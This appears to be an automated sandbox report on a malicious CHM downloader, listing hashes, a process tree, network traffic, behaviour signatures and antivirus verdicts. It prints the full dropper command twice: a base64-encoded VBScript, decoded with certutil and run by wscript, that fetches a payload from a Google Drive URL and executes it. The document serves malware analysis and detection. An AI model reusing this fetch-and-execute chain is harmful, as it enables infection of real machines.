Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	May 23, 2023, 4:18 p.m.	May 23, 2023, 4:20 p.m.

Size	12.8KB
Type	MS Windows HtmlHelp Data
MD5	`c63336057f756c711c594e8b59b0265f`
SHA256	`eeac6740c0730a6950b540c18231ed6813430ee4188f1b77bcea3f41db93ad65`
CRC32	`80709A13`
ssdeep	`192:hWR1O3Jzr1BrKd5kOPFsLPAfC3gpuARimKYdTgI:hi1ox1Z+5kIFSo6QpB47YdH`
Yara	chm_file_format - chm file format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "nSJWlP" C:\Users\test22\AppData\Local\Temp\1.chm
3028
- hh.exe "C:\Windows\hh.exe" C:\Users\test22\AppData\Local\Temp\1.chm
  2200
  - cmd.exe "C:\Windows\System32\cmd.exe" /c echo T24gRXJyb3IgUmVzdW1lIE5leHQ6U2V0IGluZXN6Y2R3bHBvaiA9IENyZWF0ZU9iamVjdCgiTVNYTUwyLlNlcnZlclhNTEhUVFAiKTppbmVzemNkd2xwb2oub3BlbiAiR0VUIiwgImh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MU92YmUxc2UzUmg5V0gxTFlUMW9iMW5ncGR0akpXMXlGJmNvbmZpcm09dCIsIEZhbHNlOmluZXN6Y2R3bHBvai5TZW5kOkV4ZWN1dGUoaW5lc3pjZHdscG9qLnJlc3BvbnNlVGV4dCkndGZmeGRkcnNkc3Nhd2R4dmNiZ25oamp1eWpidg > "C:\\ProgramData\\Iconcache.dat" & start /MIN certutil -decode "C:\\ProgramData\\Iconcache.dat" "C:\\ProgramData\\Iconcache.vbs"
    1324
    - certutil.exe certutil -decode "C:\\ProgramData\\Iconcache.dat" "C:\\ProgramData\\Iconcache.vbs"
      1220
  - wscript.exe "C:\Windows\System32\wscript.exe" //e:vbscript //b "C:\\ProgramData\\Iconcache.vbs"
    2632

Name	Response	Post-Analysis Lookup
drive.google.com	A 142.250.199.78	142.250.76.142

IP Address	Status	Action
142.250.199.78	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49175 -> 142.250.199.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49175 142.250.199.78:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	08:73:2c:18:30:14:52:c3:ca:3e:02:79:65:b4:fe:90:ac:3f:3e:33

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW May 23, 2023, 4:11 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 23, 2023, 4:11 p.m.			0	0

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 23, 2023, 4:11 p.m.	buffer: Input Length = 382 console_handle: 0x0000000000000007	1	1
WriteConsoleW May 23, 2023, 4:11 p.m.	buffer: Output Length = 283 console_handle: 0x0000000000000007	1	1
WriteConsoleW May 23, 2023, 4:11 p.m.	buffer: CertUtil: -decode command completed successfully. console_handle: 0x0000000000000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 23, 2023, 4:11 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (1 event)

request

GET https://drive.google.com/uc?export=download&id=1Ovbe1se3Rh9WH1LYT1ob1ngpdtjJW1yF&confirm=t

Allocates read-write-execute memory (usually to unpack itself) (4 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 23, 2023, 4:11 p.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa1b7000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2023, 4:11 p.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef69c9000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2023, 4:11 p.m.	process_identifier: 1220 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa1b7000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 23, 2023, 4:11 p.m.	process_identifier: 2632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa1b7000 process_handle: 0xffffffffffffffff	1

Downloads a file or document from Google Drive (1 event)

domain

drive.google.com

Creates executable files on the filesystem (1 event)

file	C:\ProgramData\Iconcache.vbs

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c echo T24gRXJyb3IgUmVzdW1lIE5leHQ6U2V0IGluZXN6Y2R3bHBvaiA9IENyZWF0ZU9iamVjdCgiTVNYTUwyLlNlcnZlclhNTEhUVFAiKTppbmVzemNkd2xwb2oub3BlbiAiR0VUIiwgImh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MU92YmUxc2UzUmg5V0gxTFlUMW9iMW5ncGR0akpXMXlGJmNvbmZpcm09dCIsIEZhbHNlOmluZXN6Y2R3bHBvai5TZW5kOkV4ZWN1dGUoaW5lc3pjZHdscG9qLnJlc3BvbnNlVGV4dCkndGZmeGRkcnNkc3Nhd2R4dmNiZ25oamp1eWpidg > "C:\\ProgramData\\Iconcache.dat" & start /MIN certutil -decode "C:\\ProgramData\\Iconcache.dat" "C:\\ProgramData\\Iconcache.vbs"

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory May 23, 2023, 4:11 p.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x000007fffffa0000 process_handle: 0xffffffffffffffff	1	0	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Wscript.exe initiated network communications indicative of a script based payload download (3 events)

Time & API	Arguments	Status	Return	Repeated
WSASend May 23, 2023, 4:11 p.m.	buffer: sodlhá¨´N»^àvÅUÏ:ùÄ\|YØorÂ÷/5 ÀÀÀ À 28.ÿdrive.google.com socket: 600		0	0
WSASend May 23, 2023, 4:11 p.m.	buffer: FBAß?âF%ÛÂ*OÜ¤îP_j£'ÖÄ/Å®mÁDH>ºRT¿fÑë ëÚ;O¹[3sµÀ; !ÉÓ0ñó>\|KÚÅäf8Vt!N2¹£Á®$4l9Ý.ÜQô_µà½Ì}U°ë socket: 600		0	0
WSASend May 23, 2023, 4:11 p.m.	buffer: ßd:±Æî%°ÛÖþ(]¹SH<ýÛh\|ðö¥ÜßYrÃ´ b¶ HdeY_z,M zpBÈSØ~»Pèp4ëz"<aji{èubwÁ0~5üÁ!fÖØ½)/L=Ô\|MÅ6õk¡;Ãavæ+¼ÄãO"%41»¢idê2øUÅ»%éÆÄÈ,7ª»m§AÕ=Ê×Â _Ñhõ¥lôú~xÓì®d*··Y;¶YñÈ?÷×=Do;ôÊ1å¬U+À¦V¨(^èÍpfí2lFeIIP¸M»]õÅ\|ÛN®dPýKø9+2¢øTnkC"x socket: 600		0	0

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (3 events)

Time & API	Arguments	Status	Return	Repeated
WSASend May 23, 2023, 4:11 p.m.	buffer: sodlhá¨´N»^àvÅUÏ:ùÄ\|YØorÂ÷/5 ÀÀÀ À 28.ÿdrive.google.com socket: 600		0	0
WSASend May 23, 2023, 4:11 p.m.	buffer: FBAß?âF%ÛÂ*OÜ¤îP_j£'ÖÄ/Å®mÁDH>ºRT¿fÑë ëÚ;O¹[3sµÀ; !ÉÓ0ñó>\|KÚÅäf8Vt!N2¹£Á®$4l9Ý.ÜQô_µà½Ì}U°ë socket: 600		0	0
WSASend May 23, 2023, 4:11 p.m.	buffer: ßd:±Æî%°ÛÖþ(]¹SH<ýÛh\|ðö¥ÜßYrÃ´ b¶ HdeY_z,M zpBÈSØ~»Pèp4ëz"<aji{èubwÁ0~5üÁ!fÖØ½)/L=Ô\|MÅ6õk¡;Ãavæ+¼ÄãO"%41»¢idê2øUÅ»%éÆÄÈ,7ª»m§AÕ=Ê×Â _Ñhõ¥lôú~xÓì®d*··Y;¶YñÈ?÷×=Do;ôÊ1å¬U+À¦V¨(^èÍpfí2lFeIIP¸M»]õÅ\|ÛN®dPýKø9+2¢øTnkC"x socket: 600		0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3028 resumed a thread in remote process 2200
Process injection	Process 1324 resumed a thread in remote process 1220
NtResumeThread May 23, 2023, 4:18 p.m.	thread_handle: 0x000002c4 suspend_count: 1 process_identifier: 2200	1	0	0
NtResumeThread May 23, 2023, 4:11 p.m.	thread_handle: 0x0000000000000060 suspend_count: 0 process_identifier: 1220	1	0	0

File has been identified by 22 AntiVirus engines on VirusTotal as malicious (22 events)

Lionic	Trojan.HTML.Generic.4!c
ALYac	Trojan.Downloader.CHM
Symantec	Trojan.Gen.NPE
ESET-NOD32	HTML/TrojanDownloader.Agent.NLU
Avast	Other:Malware-gen [Trj]
Kaspersky	UDS:DangerousObject.Multi.Generic
BitDefender	Exploit.CHM-Downloader.Gen
MicroWorld-eScan	Exploit.CHM-Downloader.Gen
Tencent	Win32.Trojan-Downloader.Ader.Fwnw
Emsisoft	Exploit.CHM-Downloader.Gen (B)
VIPRE	Exploit.CHM-Downloader.Gen
TrendMicro	HEUR_CHM.E
McAfee-GW-Edition	Artemis!Trojan
FireEye	Exploit.CHM-Downloader.Gen
GData	Exploit.CHM-Downloader.Gen
MAX	malware (ai score=86)
Arcabit	Exploit.CHM-Downloader.Gen
ZoneAlarm	HEUR:Trojan.Script.Generic
AhnLab-V3	Dropper/CHM.Generic
Rising	Trojan.MouseJack/HTML!1.BE26 (CLASSIC)
Fortinet	JS/Agent.00E5!tr
AVG	Other:Malware-gen [Trj]

1.chm

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All